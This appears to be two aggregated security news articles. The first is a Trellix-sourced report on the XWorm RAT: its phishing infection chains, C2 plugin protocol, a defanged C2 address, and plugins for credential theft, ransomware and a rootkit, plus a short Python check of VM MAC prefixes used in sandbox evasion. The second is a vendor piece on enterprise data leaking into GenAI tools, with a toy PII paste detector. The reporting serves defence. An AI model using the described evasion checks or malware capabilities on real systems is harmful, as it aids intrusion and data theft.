    In a report published last month, Trellix detailed shifting XWorm infection chains that have used Windows shortcut (LNK) files distributed via phishing emails to execute PowerShell commands that drop a harmless TXT file and a deceptive executable masquerading as Discord, which then ultimately launches the malware.

    XWorm incorporates various anti-analysis and anti-evasion mechanisms to check for tell-tale signs of a virtualized environment and, if any are found, immediately cease execution. The malware’s modularity means various commands can be issued from an external server to perform actions like shutting down or restarting the system, downloading files, opening URLs, and initiating DDoS attacks.
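    One common tell-tale sign such checks rely on is the network adapter’s vendor prefix (OUI). The sketch below is a minimal, analyst-side illustration of the idea, using a small, non-exhaustive list of well-known VM vendor OUIs; it is not XWorm’s actual implementation:

```python
# Known VM vendor MAC address prefixes (OUIs) commonly treated as
# tell-tale signs of a virtualized environment. Illustrative, not exhaustive.
VM_MAC_PREFIXES = {
    "00:05:69",  # VMware
    "00:0c:29",  # VMware
    "00:1c:14",  # VMware
    "08:00:27",  # VirtualBox
    "00:15:5d",  # Hyper-V
}

def is_vm_mac(mac: str) -> bool:
    """True if the MAC's first three octets match a known VM vendor OUI."""
    return mac.lower()[:8] in VM_MAC_PREFIXES

print(is_vm_mac("08:00:27:12:34:56"))  # True (VirtualBox OUI)
print(is_vm_mac("3c:22:fb:aa:bb:cc"))  # False
```

    Sandboxes that randomize or spoof these prefixes are one reason malware typically combines several environment checks rather than relying on a single artifact.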

    “This rapid evolution of XWorm within the threat landscape, and its current prevalence, highlights the critical importance of robust security measures to combat ever-changing threats,” the company noted.

    XWorm’s operations have also witnessed their share of setbacks over the past year, most notably XCoder’s abrupt deletion of their Telegram account in the second half of 2024, which left the future of the tool in limbo. Since then, however, threat actors have been observed distributing a cracked version of XWorm 5.6 that was itself laced with malware to infect other threat actors who downloaded it.

    This included attempts by an unknown threat actor to trick script kiddies into downloading a trojanized version of the XWorm RAT builder via GitHub repositories, file-sharing services, Telegram channels, and YouTube videos, compromising 18,459 devices globally.

    This has been complemented by attackers distributing modified versions of XWorm – one of which is a Chinese variant codenamed XSPY – as well as the discovery of a remote code execution (RCE) vulnerability in the malware that allows attackers with the command-and-control (C2) encryption key to execute arbitrary code.

    While the apparent abandonment of XWorm by XCoder raised the possibility that the project was “closed for good,” Trellix said it spotted a threat actor named XCoderTools offering XWorm 6.0 on cybercrime forums on June 4, 2025, for $500 for lifetime access, describing it as a “fully re-coded” version with a fix for the aforementioned RCE flaw. It’s currently not known whether the latest version is the work of the same developer or someone else capitalizing on the malware’s reputation.

    Campaigns distributing XWorm 6.0 in the wild have used malicious JavaScript files in phishing emails that, when opened, display a decoy PDF document, while, in the background, PowerShell code is executed to inject the malware into a legitimate Windows process like RegSvcs.exe without raising any attention.

    XWorm V6.0 is designed to connect to its C2 server at 94.159.113[.]64 on port 4411 and supports a command called “plugin” to run more than 35 DLL payloads in the infected host’s memory and carry out various tasks.

    “When the C2 server sends the command ‘plugin,’ it includes the SHA-256 hash of the plugin DLL file and the arguments for its invocation,” Trellix explained. “The client then uses the hash to check if the plugin has been previously received. If the key is not found, the client sends a ‘sendplugin’ command to the C2 server, along with the hash.”

    “The C2 server then responds with the command ‘savePlugin’ along with a base64 encoded string containing the plugin and SHA-256 hash. Upon receiving and decoding the plugin, the client loads the plugin into the memory.”

    Some of the supported plugins in XWorm 6.x (6.0, 6.4, and 6.5) are listed below –

    • RemoteDesktop.dll, to create a remote session to interact with the victim’s machine
    • WindowsUpdate.dll, Stealer.dll, Recovery.dll, merged.dll, Chromium.dll, and SystemCheck.Merged.dll, to steal the victim’s data, such as Windows product keys, Wi-Fi passwords, and stored credentials from web browsers (bypassing Chrome’s app-bound encryption) and other applications like FileZilla, Discord, Telegram, and MetaMask
    • FileManager.dll, to provide the operator with filesystem access and manipulation capabilities
    • Shell.dll, to execute system commands sent by the operator in a hidden cmd.exe process
    • Informations.dll, to gather system information about the victim’s machine
    • Webcam.dll, to record the victim and verify that an infected machine is real
    • TCPConnections.dll, ActiveWindows.dll, and StartupManager.dll, to send a list of active TCP connections, active windows, and startup programs, respectively, to the C2 server
    • Ransomware.dll, to encrypt and decrypt files and extort users for a cryptocurrency ransom (shares code overlaps with NoCry ransomware)
    • Rootkit.dll, to install a modified r77 rootkit
    • ResetSurvival.dll, to survive device resets through Windows Registry modifications

    XWorm 6.0 infections, besides dropping custom tools, have also served as a conduit for other malware families such as DarkCloud Stealer, Hworm (VBS-based RAT), Snake KeyLogger, Coin Miner, Pure Malware, ShadowSniff Stealer (open-source Rust stealer), Phantom Stealer, Phemedrone Stealer, and Remcos RAT.

    “Further investigation of the DLL file revealed multiple XWorm V6.0 Builders on VirusTotal that are themselves infected with XWorm malware, suggesting that an XWorm RAT operator has been compromised by XWorm malware!” Trellix said.

    “The unexpected return of XWorm V6, armed with a versatile array of plugins for everything from keylogging and credential theft to ransomware, serves as a powerful reminder that no malware threat is ever truly gone.”


    Source: thehackernews.com…

  • New Research: AI Is Already the #1 Data Exfiltration Channel in the Enterprise

    New Research: AI Is Already the #1 Data Exfiltration Channel in the Enterprise

    For years, security leaders have treated artificial intelligence as an “emerging” technology, something to keep an eye on but not yet mission-critical. A new Enterprise AI and SaaS Data Security Report by AI & Browser Security company LayerX proves just how outdated that mindset has become. Far from a future concern, AI is already the single largest uncontrolled channel for corporate data exfiltration—bigger than shadow SaaS or unmanaged file sharing.

    The findings, drawn from real-world enterprise browsing telemetry, reveal a counterintuitive truth: the problem with AI in enterprises isn’t tomorrow’s unknowns, it’s today’s everyday workflows. Sensitive data is already flowing into ChatGPT, Claude, and Copilot at staggering rates, mostly through unmanaged accounts and invisible copy/paste channels. Traditional DLP tools—built for sanctioned, file-based environments—aren’t even looking in the right direction.

    From “Emerging” to Essential in Record Time

    In just two years, AI tools have reached adoption levels that took email and online meetings decades to achieve. Almost one in two enterprise employees (45%) already use generative AI tools, with ChatGPT alone hitting 43% penetration. Compared with other SaaS tools, AI accounts for 11% of all enterprise application activity, rivaling file-sharing and office productivity apps.

    The twist? This explosive growth hasn’t been accompanied by governance. Instead, the vast majority of AI sessions happen outside enterprise control. 67% of AI usage occurs through unmanaged personal accounts, leaving CISOs blind to who is using what, and what data is flowing where.

    Sensitive Data Is Everywhere, and It’s Moving the Wrong Way

    Perhaps the most surprising and alarming finding is how much sensitive data is already flowing into AI platforms: 40% of files uploaded into GenAI tools contain PII or PCI data, and employees are using personal accounts for nearly four in ten of those uploads.

    Even more revealing: files are only part of the problem. The real leakage channel is copy/paste. 77% of employees paste data into GenAI tools, and 82% of that activity comes from unmanaged accounts. On average, employees perform 14 pastes per day via personal accounts, with at least three containing sensitive data.

    That makes copy/paste into GenAI the #1 vector for corporate data leaving enterprise control. It’s not just a technical blind spot; it’s a cultural one. Security programs designed to scan attachments and block unauthorized uploads miss the fastest-growing threat entirely.

    The Identity Mirage: Corporate ≠ Secure

    Security leaders often assume that “corporate” accounts equate to secure access. The data proves otherwise. Even when employees use corporate credentials for high-risk platforms like CRM and ERP, they overwhelmingly bypass SSO: 71% of CRM and 83% of ERP logins are non-federated.

    That makes a corporate login functionally indistinguishable from a personal one. Whether an employee signs into Salesforce with a Gmail address or with a password-based corporate account, the outcome is the same: no federation, no visibility, no control.

    The Instant Messaging Blind Spot

    While AI is the fastest-growing channel of data leakage, instant messaging is the quietest. 87% of enterprise chat usage occurs through unmanaged accounts, and 62% of users paste PII/PCI into them. The convergence of shadow AI and shadow chat creates a dual blind spot where sensitive data constantly leaks into unmonitored environments.

    Together, these findings paint a stark picture: security teams are focused on the wrong battlefields. The war for data security isn’t in file servers or sanctioned SaaS. It’s in the browser, where employees blend personal and corporate accounts, shift between sanctioned and shadow tools, and move sensitive data fluidly across both.

    Rethinking Enterprise Security for the AI Era

    The report’s recommendations are clear and unconventional:

    1. Treat AI security as a core enterprise category, not an emerging one. Governance strategies must put AI on par with email and file sharing, with monitoring for uploads, prompts, and copy/paste flows.
    2. Shift from file-centric to action-centric DLP. Data is leaving the enterprise not just through file uploads but through file-less methods such as copy/paste, chat, and prompt injection. Policies must reflect that reality.
    3. Restrict unmanaged accounts and enforce federation everywhere. Personal accounts and non-federated logins are functionally the same: invisible. Restricting their use – whether fully blocking them or applying rigorous context-aware data control policies – is the only way to restore visibility.
    4. Prioritize high-risk categories: AI, chat, and file storage. Not all SaaS apps are equal. These categories demand the tightest controls because they are both high-adoption and high-sensitivity.
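    As a toy illustration of the action-centric approach described above, a paste event could be screened for obvious PII patterns before it reaches a GenAI tool. The patterns and categories below are illustrative assumptions, not a complete DLP ruleset:

```python
import re

# Illustrative detectors for data that should not reach an unmanaged AI tool.
PATTERNS = {
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
    "card_number": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

def flag_paste(text: str) -> list[str]:
    """Return the PII categories detected in a pasted snippet."""
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

print(flag_paste("contact: jane.doe@example.com, card 4111 1111 1111 1111"))
# ['email', 'card_number']
print(flag_paste("summarize this meeting agenda"))
# []
```

    The point of the sketch is where the check runs, not the regexes themselves: inspecting the paste action in the browser catches the file-less channel that attachment scanners never see.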

    The Bottom Line for CISOs

    The surprising truth revealed by the data is this: AI isn’t just a productivity revolution, it’s a governance collapse. The tools employees love most are also the least controlled, and the gap between adoption and oversight is widening every day.

    For security leaders, the implications are urgent. Waiting to treat AI as “emerging” is no longer an option. It’s already embedded in workflows, already carrying sensitive data, and already serving as the leading vector for corporate data loss.

    The enterprise perimeter has shifted again, this time into the browser. If CISOs don’t adapt, AI won’t just shape the future of work, it will dictate the future of data breaches.

    The new research report from LayerX provides the full scope of these findings, offering CISOs and security teams unprecedented visibility into how AI and SaaS are really being used inside the enterprise. Drawing on real-world browser telemetry, the report details where sensitive data is leaking, which blind spots carry the greatest risk, and what practical steps leaders can take to secure AI-driven workflows. For organizations seeking to understand their true exposure and how to protect themselves, the report delivers the clarity and guidance needed to act with confidence.

    This article is a contributed piece from one of our valued partners.


    Source: thehackernews.com…